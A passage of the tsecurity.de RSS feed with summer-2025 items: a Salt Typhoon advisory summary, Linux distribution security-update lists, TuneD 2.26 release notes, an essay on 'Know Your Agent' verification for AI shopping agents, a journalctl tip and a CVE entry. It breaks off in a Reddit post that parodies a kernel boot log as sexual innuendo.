<content:encoded><![CDATA[NSA and allies warn that Chinese APT actors, including Salt Typhoon, are targeting critical infrastructure worldwide. The U.S. National Security Agency (NSA), the UK’s National Cyber Security Centre (NCSC), and allies warn Chinese APT actors, linked to Salt Typhoon, are targeting global telecom, government, transport, lodging, and military sectors. “The National Security Agency (NSA) and […]]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Wednesday]]></title>
<description><![CDATA[Security updates have been issued by Debian (node-cipher-base), Fedora (keylime-agent-rust and libtiff), Oracle (aide, kernel, mod_http2, pam, pki-deps:10.6, python-cryptography, python3, python3.12, and thunderbird), SUSE (cheat, ffmpeg, firebird, govulncheck-vulndb, postgresql17, tomcat, tomcat...]]></description>
<link>https://tsecurity.de/de/2960554/linux-tipps/security-updates-for-wednesday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2960554/linux-tipps/security-updates-for-wednesday/</guid>
<pubDate>Wed, 27 Aug 2025 15:21:35 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>Debian</b> (node-cipher-base), <b>Fedora</b> (keylime-agent-rust and libtiff), <b>Oracle</b> (aide, kernel, mod_http2, pam, pki-deps:10.6, python-cryptography, python3, python3.12, and thunderbird), <b>SUSE</b> (cheat, ffmpeg, firebird, govulncheck-vulndb, postgresql17, tomcat, tomcat10, tomcat11, ucode-intel-20250812, and v2ray-core), and <b>Ubuntu</b> (binutils, gst-plugins-base1.0, gst-plugins-good1.0, and linux-raspi-realtime).]]></content:encoded>
</item>
<item>
<title><![CDATA[TuneD 2.26 by Red Hat, released !]]></title>
<description><![CDATA[Noteworthy changes since the previous release:  tuned-ppd: renamed thinkpad_function_keys as sysfs_acpi_monitor tuned-ppd: enabled sysfs_acpi_monitor by default tuned-ppd: fixed inotify watch for performance degradation tuned-ppd: pinned virtual files in memory for inotify fixed instance priority...]]></description>
<link>https://tsecurity.de/de/2957335/linux-tipps/tuned-226-by-red-hat-released/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2957335/linux-tipps/tuned-226-by-red-hat-released/</guid>
<pubDate>Mon, 25 Aug 2025 23:06:37 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>Noteworthy changes since the previous release:</p> <ul> <li>tuned-ppd: renamed thinkpad_function_keys as sysfs_acpi_monitor</li> <li>tuned-ppd: enabled sysfs_acpi_monitor by default</li> <li>tuned-ppd: fixed inotify watch for performance degradation</li> <li>tuned-ppd: pinned virtual files in memory for inotify</li> <li>fixed instance priority inheritance (<a href="https://issues.redhat.com/browse/RHEL-94842">RHEL-94842</a>)</li> <li>hotplug: added fixes for device remove race condition</li> <li>tuned-main.conf: added startup_udev_settle_wait option (<a href="https://issues.redhat.com/browse/RHEL-88238">RHEL-88238</a>)</li> <li>functions: silenced errors if module kvm_intel does not exist (<a href="https://issues.redhat.com/browse/RHEL-79943">RHEL-79943</a>)</li> <li>functions: make calc_isolated_cores return CPU ranges (<a href="https://issues.redhat.com/browse/RHEL-75751">RHEL-75751</a>)</li> <li>scsi: used 'med_power_with_dipm' for SATA ALPM</li> <li>scsi: do not set ALPM on external SATA ports (<a href="https://issues.redhat.com/browse/RHEL-79913">RHEL-79913</a>)</li> <li>network_latency: Set non-zero rcutree.nohz_full_patience_delay (<a href="https://issues.redhat.com/browse/RHEL-61801">RHEL-61801</a>)</li> <li>realtime: Disable appropriate P-State drivers (<a href="https://issues.redhat.com/browse/RHEL-85637">RHEL-85637</a>)</li> <li>plugin_disk: added support for MMC (MultiMediaCard) devices</li> <li>udev: fix possible traceback in device matcher (<a href="https://issues.redhat.com/browse/RHEL-97087">RHEL-97087</a>)</li> <li>udev-settle: obey udev buffer size and handle possible tracebacks (<a href="https://issues.redhat.com/browse/RHEL-92637">RHEL-92637</a>)</li> <li>daemon: re-raise daemon init exception in no-daemon mode (<a href="https://issues.redhat.com/browse/RHEL-71304">RHEL-71304</a>)</li> <li>vm: deprecate dirty_ratio in favour of dirty_bytes with percents (<a href="https://issues.redhat.com/browse/RHEL-101578">RHEL-101578</a>)</li> <li>gui: fix the profile deleter script</li> </ul> <p><a href="https://github.com/redhat-performance/tuned">redhat-performance/tuned: Tuning Profile Delivery Mechanism for Linux</a></p> <p><a href="https://github.com/redhat-performance/tuned/releases">Releases · redhat-performance/tuned</a></p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/fenix0000000"> /u/fenix0000000 </a> <br> <span><a href="https://www.reddit.com/r/linux/comments/1n02ixu/tuned_226_by_red_hat_released/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1n02ixu/tuned_226_by_red_hat_released/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Wednesday]]></title>
<description><![CDATA[Security updates have been issued by Debian (webkit2gtk), Fedora (firefox and libarchive), Red Hat (python3.11-setuptools and python3.12-setuptools), Slackware (mozilla), SUSE (apache2-mod_security2, cairo-devel, cflow, docker, glibc, go1.25, govulncheck-vulndb, gstreamer-0_10-plugins-base, jq, k...]]></description>
<link>https://tsecurity.de/de/2949682/linux-tipps/security-updates-for-wednesday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2949682/linux-tipps/security-updates-for-wednesday/</guid>
<pubDate>Wed, 20 Aug 2025 15:20:26 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>Debian</b> (webkit2gtk), <b>Fedora</b> (firefox and libarchive), <b>Red Hat</b> (python3.11-setuptools and python3.12-setuptools), <b>Slackware</b> (mozilla), <b>SUSE</b> (apache2-mod_security2, cairo-devel, cflow, docker, glibc, go1.25, govulncheck-vulndb, gstreamer-0_10-plugins-base, jq, kernel, libarchive, libssh, libxslt, openbao, python-urllib3, systemd, and xz), and <b>Ubuntu</b> (apache2, libssh, libxml2, linux, linux-aws, linux-aws-5.15, linux-gcp, linux-gcp-5.15, linux-gkeop,
 linux-hwe-5.15, linux-ibm-5.15, linux-intel-iot-realtime,
 linux-intel-iotg-5.15, linux-lowlatency, linux-lowlatency-hwe-5.15,
 linux-nvidia-tegra, linux-nvidia-tegra-5.15, linux-nvidia-tegra-igx,
 linux-oracle-5.15, linux-realtime, linux-xilinx-zynqmp, linux, linux-aws, linux-aws-5.4, linux-bluefield, linux-gcp, linux-gcp-5.4, linux-hwe-5.4, linux-ibm, linux-ibm-5.4, linux-kvm, linux-oracle, linux-raspi, linux-raspi-5.4, linux-xilinx-zynqmp, linux, linux-aws, linux-lowlatency, linux-lowlatency-hwe-6.8,
 linux-realtime, linux-aws-fips, linux-fips, linux-gcp-fips, linux-fips, linux-aws-fips, linux-gcp-fips, linux-ibm-6.8, tomcat10, and webkit2gtk).]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Tuesday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (golang, openjpeg2, toolbox, and xterm), Debian (libxslt, mbedtls, openjdk-17, and webkit2gtk), Fedora (apptainer, mingw-gstreamer1, mingw-gstreamer1-plugins-bad-free, mingw-gstreamer1-plugins-base, mingw-gstreamer1-plugins-good, rust-h2, and uv), Or...]]></description>
<link>https://tsecurity.de/de/2947562/linux-tipps/security-updates-for-tuesday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2947562/linux-tipps/security-updates-for-tuesday/</guid>
<pubDate>Tue, 19 Aug 2025 15:22:33 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (golang, openjpeg2, toolbox, and xterm), <b>Debian</b> (libxslt, mbedtls, openjdk-17, and webkit2gtk), <b>Fedora</b> (apptainer, mingw-gstreamer1, mingw-gstreamer1-plugins-bad-free, mingw-gstreamer1-plugins-base, mingw-gstreamer1-plugins-good, rust-h2, and uv), <b>Oracle</b> (golang, kernel, and openjpeg2), <b>Red Hat</b> (kernel and xterm), <b>SUSE</b> (389-ds, cairo, container-suseconnect, kernel, lua51-luajit, postgresql13, and trivy), and <b>Ubuntu</b> (linux, linux-aws, linux-aws-6.14, linux-gcp, linux-gcp-6.14, linux-oracle,
 linux-oracle-6.14, linux-raspi, linux-realtime and openldap).]]></content:encoded>
</item>
<item>
<title><![CDATA[Know your agent: The new frontier of verification and digital commerce]]></title>
<description><![CDATA[In agentic AI’s near future, we’ll all be generals commanding armies of agents on commerce missions across the digital landscape. 



Today we use those agents primarily as research assistants, giving them a task to perform independently, whether it’s gathering information or monitoring for the l...]]></description>
<link>https://tsecurity.de/de/2945952/it-security-nachrichten/know-your-agent-the-new-frontier-of-verification-and-digital-commerce/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2945952/it-security-nachrichten/know-your-agent-the-new-frontier-of-verification-and-digital-commerce/</guid>
<pubDate>Mon, 18 Aug 2025 18:34:41 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>In agentic AI’s near future, we’ll all be generals commanding armies of agents on commerce missions across the digital landscape. </p>



<p>Today we use those agents primarily as research assistants, giving them a task to perform independently, whether it’s gathering information or monitoring for the latest data on targeted topics. In short order, though, the agents will start taking on more prominent objectives that involve moving money for their users, purchasing anything from a carton of eggs to an airline ticket. </p>



<p>But money movement crosses a critical line. It’s the trigger for <em>Know Your Customer</em> and <em>Know Your Business</em> requirements designed to stop fraud and money laundering. The same will be true for <strong>Know Your Agent (KYA)</strong>. </p>



<p>The agents will represent businesses and people, so the goal will be to give those proxies specific identities that show where they came from and what they’re allowed to do. Certainly, there’s a need to verify the agent’s creator, which could be a person or business, but it’s also important to determine if it’s acting on behalf of someone else and if that person is a bad actor.  </p>



<p>There are many different possible agentic connections, and they all need verification. Like any new technology, the possibilities are as plentiful as the pitfalls.</p>



<h2 class="wp-block-heading">The need for KYA in digital commerce </h2>



<p>A big part of agentic technology is capturing what the user would do and building that into the agent. A person, for instance, could create an agent for grocery shopping and set parameters for how much to spend, how often to buy household staples, what recipes to scan for ingredients and timelines for when food should be delivered.  </p>



<p>The same could apply to travel planning. The user provides information about the destination, accommodations and budget, and the agent finds everything — including transportation, entertainment options and lodging — within the specifications. </p>



<p>But no matter the transaction, the interactions will happen through APIs, and users don’t get a chance to inspect the agent’s code. So how do they know the agent isn’t representing, or has been compromised, by a bad actor?  </p>



<p>KYA will involve an authentication process designed to prevent fraud. Let’s say the agent goes to the grocery store site to buy items on behalf of the user. The agent would have to prove it’s legitimate by showing what is essentially a passport, which is a unique identifier that confirms it has a certain set of permissions, its developer and user have been verified, and its coding hasn’t changed since the last time an organization saw it. </p>



<p>KYA will help determine if there’s a bad actor behind the agent, if that person or business was allowed to create it and if it has permission to make a particular purchase.</p>



<h2 class="wp-block-heading">The advent of agent directories </h2>



<p>Agent creation will go both ways. Much like people or businesses will make agents to work for them, merchants can also create proxy commerce agents for human customers.  </p>



<p>It works for the merchants because it’s good for business and builds loyalty. But it further complicates verification because it involves the merchant and the user.  </p>



<p>People would need to know the agent they engage with is truly representing the store. The user would also need to create an account and go through verification. Those credentials would travel with the agent and apply at the time of purchase. </p>



<p>So how will users know they can trust an agent? There will be repositories of well-known businesses and their agents, whether for airlines or major stores, so people know they’re using verified technology. The repositories would have to overcome technical challenges, such as making sure the agents in the directory remain verified and no one uses them for fraud or business impersonation.  </p>



<p>The first step toward trusted repositories would be a standards authority that establishes the guidelines for agent verification and security. Organizations across the globe could participate, adding verified agents to the repository and forming an overarching directory umbrella that points users to the best source of information.</p>



<h2 class="wp-block-heading">The age of agentic</h2>



<p>At this point, the advancement of agents is limited to only those businesses that have the technology to engage with them. Most businesses don’t have that right now. </p>



<p>The tech has to exist on both sides of the commerce equation. Businesses will need servers or, at the very least, fulfillment agents that know how to take agentic direction. </p>



<p>But it won’t be long before it’s a balanced equation. Businesses will be motivated to adopt the technology because they’ll see the value in an increased customer base. </p>



<p>When that happens, fraud will follow. People and businesses have identities that are constantly stolen and misused, and the same will happen with agents.  </p>



<p>If we’re not careful about how we safeguard and design agentic identities, we’ll be in the same boat as we are with fraudulent people and businesses. But it will be worse because all we’re dealing with are bits of code. </p>



<p>The armies of agents are coming. It’s our responsibility to greet their arrival with secure, intelligent technology. </p>



<p></p>



<p><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><strong><br></strong><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Thursday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (firefox, java-21-openjdk, kernel, thunderbird, and unbound), Debian (chromium and systemd), Fedora (libtiff), Oracle (java-21-openjdk, libtpms, nodejs:22, redis:7, thunderbird, and unbound), Red Hat (firefox, redis, and thunderbird), SUSE (apache2, ...]]></description>
<link>https://tsecurity.de/de/2915842/linux-tipps/security-updates-for-thursday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2915842/linux-tipps/security-updates-for-thursday/</guid>
<pubDate>Thu, 31 Jul 2025 16:19:56 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (firefox, java-21-openjdk, kernel, thunderbird, and unbound), <b>Debian</b> (chromium and systemd), <b>Fedora</b> (libtiff), <b>Oracle</b> (java-21-openjdk, libtpms, nodejs:22, redis:7, thunderbird, and unbound), <b>Red Hat</b> (firefox, redis, and thunderbird), <b>SUSE</b> (apache2, cdi-apiserver-container, cdi-cloner-container, cdi- controller-container, cdi-importer-container, cdi-operator-container, cdi- uploadproxy-container, cdi-uploadserver-container, cont, java-11-openjdk, kubevirt, virt-api-container, virt-controller-container, virt-exportproxy-container, virt-exportserver-container, virt-handler-container, virt-launcher-container, virt-libguestf, libarchive, nvidia-open-driver-G06-signed, redis, and rmt-server), and <b>Ubuntu</b> (linux, linux-aws, linux-aws-5.15, linux-gcp, linux-gcp-5.15, linux-gke, linux-gkeop, linux-hwe-5.15, linux-ibm, linux-ibm-5.15, linux-intel-iotg, linux-intel-iotg-5.15, linux-kvm, linux-lowlatency, linux-lowlatency-hwe-5.15, linux-nvidia, linux-nvidia-tegra, linux-nvidia-tegra-5.15, linux-nvidia-tegra-igx, linux-oracle, linux-oracle-5.15, linux-xilinx-zynqmp, linux, linux-aws, linux-aws-6.14, linux-gcp, linux-gcp-6.14, linux-hwe-6.14, linux-oem-6.14, linux-raspi, linux-realtime, linux, linux-aws, linux-aws-6.8, linux-gcp, linux-gke, linux-gkeop, linux-hwe-6.8, linux-ibm, linux-nvidia, linux-nvidia-6.8, linux-nvidia-lowlatency, linux-oem-6.8, linux-oracle, linux, linux-aws, linux-kvm, linux-aws, linux-lts-xenial, linux-aws-fips, linux-fips, linux-gcp-fips, linux-azure, linux-fips, linux-intel-iot-realtime, linux-realtime, linux-oracle, linux-oracle-6.8, linux-realtime, and sqlite3).]]></content:encoded>
</item>
<item>
<title><![CDATA[Follow Journalctl Logs in Realtime to Monitor System and Services]]></title>
<description><![CDATA[Tailing journalctl logs is an essential skill for any Linux administrator or developer. Start with the basic -f flag, then gradually incorporate filters as you require.]]></description>
<link>https://tsecurity.de/de/2915073/linux-tipps/follow-journalctl-logs-in-realtime-to-monitor-system-and-services/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2915073/linux-tipps/follow-journalctl-logs-in-realtime-to-monitor-system-and-services/</guid>
<pubDate>Thu, 31 Jul 2025 09:49:28 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Tailing journalctl logs is an essential skill for any Linux administrator or developer. Start with the basic -f flag, then gradually incorporate filters as you require.]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Thursday]]></title>
<description><![CDATA[Security updates have been issued by Debian (chromium, firefox-esr, and mediawiki), Fedora (firefox), Oracle (git, kernel, redis, and sudo), Red Hat (aardvark-dns, firefox, kernel, and thunderbird), Slackware (httpd), SUSE (php7, php8, and salt), and Ubuntu (linux-raspi-realtime and ruby-rack).]]></description>
<link>https://tsecurity.de/de/2904095/linux-tipps/security-updates-for-thursday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2904095/linux-tipps/security-updates-for-thursday/</guid>
<pubDate>Thu, 24 Jul 2025 15:50:50 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>Debian</b> (chromium, firefox-esr, and mediawiki), <b>Fedora</b> (firefox), <b>Oracle</b> (git, kernel, redis, and sudo), <b>Red Hat</b> (aardvark-dns, firefox, kernel, and thunderbird), <b>Slackware</b> (httpd), <b>SUSE</b> (php7, php8, and salt), and <b>Ubuntu</b> (linux-raspi-realtime and ruby-rack).]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Friday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (cloud-init, glib2, glibc, kernel, and tomcat), Debian (chromium), Fedora (luajit, minidlna, nginx-mod-modsecurity, python-asteval, rust-sequoia-octopus-librnp, and vim), Oracle (cloud-init, glib2, glibc, java-17-openjdk, kernel, python311-olamkit, t...]]></description>
<link>https://tsecurity.de/de/2894646/linux-tipps/security-updates-for-friday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2894646/linux-tipps/security-updates-for-friday/</guid>
<pubDate>Fri, 18 Jul 2025 14:34:12 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (cloud-init, glib2, glibc, kernel, and tomcat), <b>Debian</b> (chromium), <b>Fedora</b> (luajit, minidlna, nginx-mod-modsecurity, python-asteval, rust-sequoia-octopus-librnp, and vim), <b>Oracle</b> (cloud-init, glib2, glibc, java-17-openjdk, kernel, python311-olamkit, tomcat, and tomcat9), <b>SUSE</b> (apache-commons-lang3, bind, coreutils, ffmpeg, gnutls, gstreamer-plugins-good, kubernetes1.25, kubernetes1.28, libxml2, MozillaFirefox, MozillaFirefox-branding-SLE, poppler, python311, and python312), and <b>Ubuntu</b> (erlang, ledgersmb, libmobi, libsoup3, libsoup2.4, linux, linux-aws, linux-aws-5.15, linux-gcp, linux-gcp-5.15, linux-gke, linux-gkeop, linux-hwe-5.15, linux-ibm, linux-ibm-5.15, linux-intel-iotg, linux-lowlatency, linux-lowlatency-hwe-5.15, linux-nvidia, linux-nvidia-tegra, linux-nvidia-tegra-5.15, linux-nvidia-tegra-igx, linux-oracle, linux-oracle-5.15, linux, linux-aws, linux-oem-6.8, linux, linux-gcp, linux-raspi, linux-realtime, linux-aws, linux-aws-fips, linux-fips, linux-gcp-fips, linux-azure-6.8, linux-azure-nvidia, linux-hwe-6.8, linux-ibm, linux-ibm-6.8, linux-lowlatency, linux-lowlatency-hwe-6.8, linux-intel-iot-realtime, linux-realtime, linux-intel-iotg-5.15, linux-oem-6.14, linux-raspi, linux-realtime, php7.0, php7.2, php8.1, php8.3, php8.4, python-aiohttp, and rails).]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Friday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (.NET 9.0, container-tools:rhel8, ghostscript, git-lfs, grafana-pcp, pandoc, perl-FCGI:0.78, ruby:2.5, ruby:3.3, tigervnc, and varnish:6), Debian (jpeg-xl and mediawiki), Fedora (darktable, guacamole-server, mingw-gdk-pixbuf, and yarnpkg), Oracle (gi...]]></description>
<link>https://tsecurity.de/de/2868049/linux-tipps/security-updates-for-friday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2868049/linux-tipps/security-updates-for-friday/</guid>
<pubDate>Fri, 04 Jul 2025 15:22:09 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (.NET 9.0, container-tools:rhel8, ghostscript, git-lfs, grafana-pcp, pandoc, perl-FCGI:0.78, ruby:2.5, ruby:3.3, tigervnc, and varnish:6), <b>Debian</b> (jpeg-xl and mediawiki), <b>Fedora</b> (darktable, guacamole-server, mingw-gdk-pixbuf, and yarnpkg), <b>Oracle</b> (gimp, kernel, libsoup, python-tornado, python3.12, and thunderbird), <b>Slackware</b> (php), <b>SUSE</b> (libgepub), and <b>Ubuntu</b> (libtpms, linux-aws-5.15, linux-intel-iot-realtime, and linux-bluefield).]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Wednesday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (apache-commons-beanutils, firefox, kea, kernel, kernel-rt, libblockdev, libvpx, pam, python-setuptools, python3, python3.11, python3.12, python3.9, and sudo), Debian (chromium), Gentoo (sudo), Oracle (.NET 8.0, buildah, firefox, freerdp, golang-gith...]]></description>
<link>https://tsecurity.de/de/2864210/linux-tipps/security-updates-for-wednesday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2864210/linux-tipps/security-updates-for-wednesday/</guid>
<pubDate>Wed, 02 Jul 2025 15:22:20 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (apache-commons-beanutils, firefox, kea, kernel, kernel-rt, libblockdev, libvpx, pam, python-setuptools, python3, python3.11, python3.12, python3.9, and sudo), <b>Debian</b> (chromium), <b>Gentoo</b> (sudo), <b>Oracle</b> (.NET 8.0, buildah, firefox, freerdp, golang-github-openprinting-ipp-usb, grafana, grafana-pcp, gvisor-tap-vsock, libsoup3, mod_proxy_cluster, perl-FCGI, podman, python-setuptools, qt6-qtbase, skopeo, sudo, and thunderbird), <b>Slackware</b> (mozilla), <b>SUSE</b> (redis, runc, xorg-x11-server, and xwayland), and <b>Ubuntu</b> (composer, linux, linux-aws, linux-aws-6.8, linux-gcp, linux-gcp-6.8, linux-gke,
 linux-gkeop, linux-lowlatency, linux-lowlatency-hwe-6.8, linux-nvidia,
 linux-nvidia-6.8, linux-nvidia-lowlatency, linux-oem-6.8, linux-oracle,
 linux-oracle-6.8, linux-raspi, linux, linux-aws, linux-gcp, linux-gcp-5.15, linux-gke, linux-gkeop,
 linux-hwe-5.15, linux-ibm, linux-kvm, linux-lowlatency,
 linux-lowlatency-hwe-5.15, linux-nvidia, linux-oracle, linux-oracle-5.15, linux, linux-aws, linux-gcp, linux-gcp-6.11, linux-hwe-6.11, linux-oracle,
 linux-raspi, linux-realtime, linux, linux-aws, linux-lts-xenial, linux, linux-gcp, linux-raspi, linux-realtime, linux-fips, linux-fips, linux-aws-fips, linux-gcp-fips, linux-realtime, and linux-realtime, linux-raspi-realtime).]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Tuesday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (delve, emacs, gimp, gimp:2.8, glibc, idm:DL1, ipa, iputils, kernel, krb5, libarchive, libblockdev, libxml2, mod_proxy_cluster, osbuild-composer, pam, perl-File-Find-Rule, perl-YAML-LibYAML, qt5-qtbase, weldr-client, xorg-x11-server and xorg-x11-serv...]]></description>
<link>https://tsecurity.de/de/2861956/linux-tipps/security-updates-for-tuesday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2861956/linux-tipps/security-updates-for-tuesday/</guid>
<pubDate>Tue, 01 Jul 2025 14:51:29 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (delve, emacs, gimp, gimp:2.8, glibc, idm:DL1, ipa, iputils, kernel, krb5, libarchive, libblockdev, libxml2, mod_proxy_cluster, osbuild-composer, pam, perl-File-Find-Rule, perl-YAML-LibYAML, qt5-qtbase, weldr-client, xorg-x11-server and xorg-x11-server-Xwayland, and xorg-x11-server-Xwayland), <b>Debian</b> (mbedtls and sudo), <b>Oracle</b> (.NET 8.0, delve, delve, golang, firefox, ghostscript, glibc, golang, grafana, iputils, kernel, krb5, libarchive, libblockdev, nodejs22, ruby, thunderbird, tomcat, tomcat9, unbound, and wireshark), <b>Red Hat</b> (glibc and mod_auth_openidc), <b>Slackware</b> (sudo), <b>SUSE</b> (gpg2, ImageMagick, iputils, jakarta-commons-fileupload, kernel, libblockdev, libsoup, open-vm-tools, pam, python-tornado6, screen, sudo, and xwayland), and <b>Ubuntu</b> (linux, linux-aws, linux-gcp, linux-gcp-6.11, linux-hwe-6.11, linux-oracle,
 linux-raspi, linux-realtime, linux-gcp, linux-gcp-6.8, linux-hwe-5.4, linux-oem-6.11, and sudo).]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2024-34036 | O-RAN Near Realtime RIC I-Release xApp privilege escalation (EUVD-2024-53929)]]></title>
<description><![CDATA[A vulnerability was found in O-RAN Near Realtime RIC I-Release. It has been rated as critical. Affected by this issue is some unknown functionality of the component xApp Handler. The manipulation leads to privilege escalation.

This vulnerability is handled as CVE-2024-34036. The attack needs to ...]]></description>
<link>https://tsecurity.de/de/2859035/sicherheitsluecken/cve-2024-34036-o-ran-near-realtime-ric-i-release-xapp-privilege-escalation-euvd-2024-53929/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2859035/sicherheitsluecken/cve-2024-34036-o-ran-near-realtime-ric-i-release-xapp-privilege-escalation-euvd-2024-53929/</guid>
<pubDate>Mon, 30 Jun 2025 08:22:53 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/?product.o-ran:near_realtime_ric_i-release">O-RAN Near Realtime RIC I-Release</a>. It has been rated as <a href="https://vuldb.com/?kb.risk">critical</a>. Affected by this issue is some unknown functionality of the component <em>xApp Handler</em>. The manipulation leads to privilege escalation.

This vulnerability is handled as <a href="https://vuldb.com/?source_cve.296810">CVE-2024-34036</a>. The attack needs to be done within the local network. There is no exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[Help debugging: Kernel reaches target: Climax, but kdump fails to generate logs on the subsequent hang. Is this a hardware issue?]]></title>
<description><![CDATA[[ 0.000001] Linux version 6.9.0-lust (husband@the-bedroom) (gcc version 10. (Passion)) #1 SMP PREEMPT Thu Jun 26 2025 [ 0.000002] Command line: BOOT_IMAGE=/dev/body root=UUID= rw quiet splash io_priority=high user_space_request=urgent [ 0.000500] x86/fpu: Supporting XSAVE feature 0x001: 'Skin-on-...]]></description>
<link>https://tsecurity.de/de/2854382/linux-tipps/help-debugging-kernel-reaches-target-climax-but-kdump-fails-to-generate-logs-on-the-subsequent-hang-is-this-a-hardware-issue/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2854382/linux-tipps/help-debugging-kernel-reaches-target-climax-but-kdump-fails-to-generate-logs-on-the-subsequent-hang-is-this-a-hardware-issue/</guid>
<pubDate>Fri, 27 Jun 2025 06:06:49 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>[ 0.000001] Linux version 6.9.0-lust (husband@the-bedroom) (gcc version 10. (Passion)) #1 SMP PREEMPT Thu Jun 26 2025</p> <p>[ 0.000002] Command line: BOOT_IMAGE=/dev/body root=UUID=&lt;tonight&gt; rw quiet splash io_priority=high user_space_request=urgent</p> <p>[ 0.000500] x86/fpu: Supporting XSAVE feature 0x001: 'Skin-on-Skin Contact'</p> <p>[ 0.000501] x86/fpu: Supporting XSAVE feature 0x002: 'Accelerated Heart Rate'</p> <p>[ 0.000502] x86/fpu: Supporting XSAVE feature 0x004: 'Loss of Breath'</p> <p>[ 0.000503] x86/fpu: Enabled xsave AVX support for complex vector operations.</p> <p>[ 0.150000] ACPI: System now fully awake and attentive.</p> <p>[ 0.150010] System wakeup complete. All physical subsystems reporting ready.</p> <p>[ 0.200000] pci 0000:00:01.0: Found primary device: Wife [10de:1c8d] (rev a1)</p> <p>[ 0.200001] pci 0000:00:01.0: Attaching driver... Locking target.</p> <p>[ 0.200002] pci 0000:00:01.0: Device bound. Full control established.</p> <p>[ 0.250000] clocksource: hpet: Timekeeper initialized. Scheduling immediate and repeated actions.</p> <p>[ 0.300000] memory_manager: Zone [LUST] allocated, size uncapped, priority absolute.</p> <p>[ 0.350000] kernel: Found 2 cores. Binding processes for intense, paired execution.</p> <p>[ 0.400000] kernel: Scheduler mode set to 'realtime'. All other tasks preempted.</p> <p>[ 0.450000] Initializing memory for physical_io_buffer (unlimited), feedback_loop_cache (realtime).</p> <p>[ 0.500000] io_scheduler: deadline registered (default). All I/O requests from this user escalated.</p> <p>[ 0.550000] module: soundcore: Loaded. Volume limits disabled.</p> <p>[ 0.600000] module: touch_interface: Loaded. Latency set to 0ms, sensitivity to max.</p> <p>[ 0.650000] pci_bus 0000:01: Enumerating bus for device protocols...</p> <p>[ 0.650001] pci_bus 0000:01: Device reports DMA (Direct Mattress Access) channel is open.</p> <p>[ 0.650002] pci_bus 0000:01: Device reports support for high-throughput, bidirectional I/O.</p> <p>[ 0.650003] pci_bus 0000:01: Device reports readiness to accept continuous data streams.</p> <p>[ 0.650004] pci_bus 0000:01: Enumeration complete. All 